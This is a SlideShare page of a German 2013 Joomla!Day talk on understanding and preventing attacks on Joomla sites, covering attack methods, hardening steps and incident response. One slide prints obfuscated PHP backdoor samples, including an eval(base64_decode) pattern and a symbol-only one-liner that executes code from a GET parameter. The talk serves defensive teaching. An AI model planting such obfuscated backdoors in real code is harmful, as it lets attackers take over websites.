Angriffe auf Joomla
verstehen und verhindern.
Simon Samtleben
Joomla!Day Deutschland 2013
www.yagendoo.com
Simon Samtleben
@lemmingzshadow
Webentwickler @ yagendoo Media GmbH in Köln
www.yagendoo.com | lemmingzshadow.net
● PHP En...
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla)...
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
System infizieren
● Vollständig automatisiert
● Typische „Injections“
– Webshells
– Iframes
– Javascripts (Cookie Bombs, ....
Bild: webroot.com
Bild: webroot.com
Warum werden (Joomla)
Webseiten angegriffen?
● Verbreitung von Malware
● Aufbau von Botnets
● E-Mail Spam
● Backlinks / SE...
Die Masse macht's
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla)...
Serverseitige Schutzmaßnahmen
● Auto IP-Blacklisting
● SSH Login nur über Keys
● Chroot für Projekte
● SFTP statt FTP
● Ei...
Joomlaseitige Schutzmaßnahmen
● Nicht benötigte Erweiterungen löschen
– Auch bei „Schutzsoftware“ vorsichtig sein
– Vorsic...
Joomlaseitige Schutzmaßnahmen
● Regelmäßige Backup
– Akeeba Backup
– Duply, Rsync, Snapshots, …
– Auch alte Backups vorhal...
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla)...
Was tun wenn mein System
kompromittiert wurde?
● Don't Panic
– Keine wichtige Spuren löschen.
– Backup anlegen.
● Wenn mög...
Was tun wenn mein System
kompromittiert wurde?
● Infektionen sind schwer zu finden
– Einfach
● eval(base64_decode('...'));...
Fragen?
www.yagendoo.com
lemmingzshadow.net
Vielen Dank für's Zuhören!
Joomla Security: Angriffe verstehen und verhindern  (Joomladay 2013 Vortrag by yagendoo.com)
Joomla Security: Angriffe verstehen und verhindern  (Joomladay 2013 Vortrag by yagendoo.com)
Upcoming SlideShare
Loading in …5
×

Joomla Security: Angriffe verstehen und verhindern (Joomladay 2013 Vortrag by yagendoo.com)

1,503 views

Published on

Dieser Vortrag wurde beim Joomladay 2013 vom Simon Samtleben von www.yagendoo.com gehalten.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,503
On SlideShare
0
From Embeds
0
Number of Embeds
476
Actions
Shares
0
Downloads
1
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Joomla Security: Angriffe verstehen und verhindern (Joomladay 2013 Vortrag by yagendoo.com)

  1. 1. Angriffe auf Joomla verstehen und verhindern. Simon Samtleben Joomla!Day Deutschland 2013 www.yagendoo.com
  2. 2. Simon Samtleben @lemmingzshadow Webentwickler @ yagendoo Media GmbH in Köln www.yagendoo.com | lemmingzshadow.net ● PHP Entwicklung ● Joomla ● Websockets ● Serveradministration ● Debian ● Nginx ● Security ● yagendoo.com ● gulli.com ● anonym.to ● 3gstore.de ● iphoneohnevertrag.de
  3. 3. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  4. 4. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  5. 5. Bild: webroot.com
  6. 6. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  7. 7. Bild: webroot.com
  8. 8. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  9. 9. System infizieren ● Vollständig automatisiert ● Typische „Injections“ – Webshells – Iframes – Javascripts (Cookie Bombs, ...) – Cloaking/Redirects – Sonstiges (IRC Bots, ...)
  10. 10. Bild: webroot.com
  11. 11. Bild: webroot.com
  12. 12. Warum werden (Joomla) Webseiten angegriffen? ● Verbreitung von Malware ● Aufbau von Botnets ● E-Mail Spam ● Backlinks / SEO ● Gezielte Angriffe – Stehlen von Daten
  13. 13. Die Masse macht's
  14. 14. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  15. 15. Serverseitige Schutzmaßnahmen ● Auto IP-Blacklisting ● SSH Login nur über Keys ● Chroot für Projekte ● SFTP statt FTP ● Eigene SQL Benutzer pro Projekt ● Monitoring (Last, Prozesse, Netzwerk, …) ● Updates, Updates, Updates
  16. 16. Joomlaseitige Schutzmaßnahmen ● Nicht benötigte Erweiterungen löschen – Auch bei „Schutzsoftware“ vorsichtig sein – Vorsicht bei lange nicht aktualisierten Erweiterungen ● Regelmäßig auf Infektionen prüfen – urlquery.net – virustotal.com – myjoomla.com – Extensions
  17. 17. Joomlaseitige Schutzmaßnahmen ● Regelmäßige Backup – Akeeba Backup – Duply, Rsync, Snapshots, … – Auch alte Backups vorhalten! ● Updates, Updates, UPDATES! – Joomla & Extensions – Newsletter, Blogs, Auto-Update, ...
  18. 18. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  19. 19. Was tun wenn mein System kompromittiert wurde? ● Don't Panic – Keine wichtige Spuren löschen. – Backup anlegen. ● Wenn möglich: Neu aufsetzen. ● Wenn nicht: Backup einspielen. ● Sonst: „Infektionen“ beseitigen.
  20. 20. Was tun wenn mein System kompromittiert wurde? ● Infektionen sind schwer zu finden – Einfach ● eval(base64_decode('...')); – Schwieriger ● $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); – Hacker :) ● $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++ $__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++ $___.$___.++$_.$__.++$___; $_($_GET['p']);
  21. 21. Fragen? www.yagendoo.com lemmingzshadow.net
  22. 22. Vielen Dank für's Zuhören!

×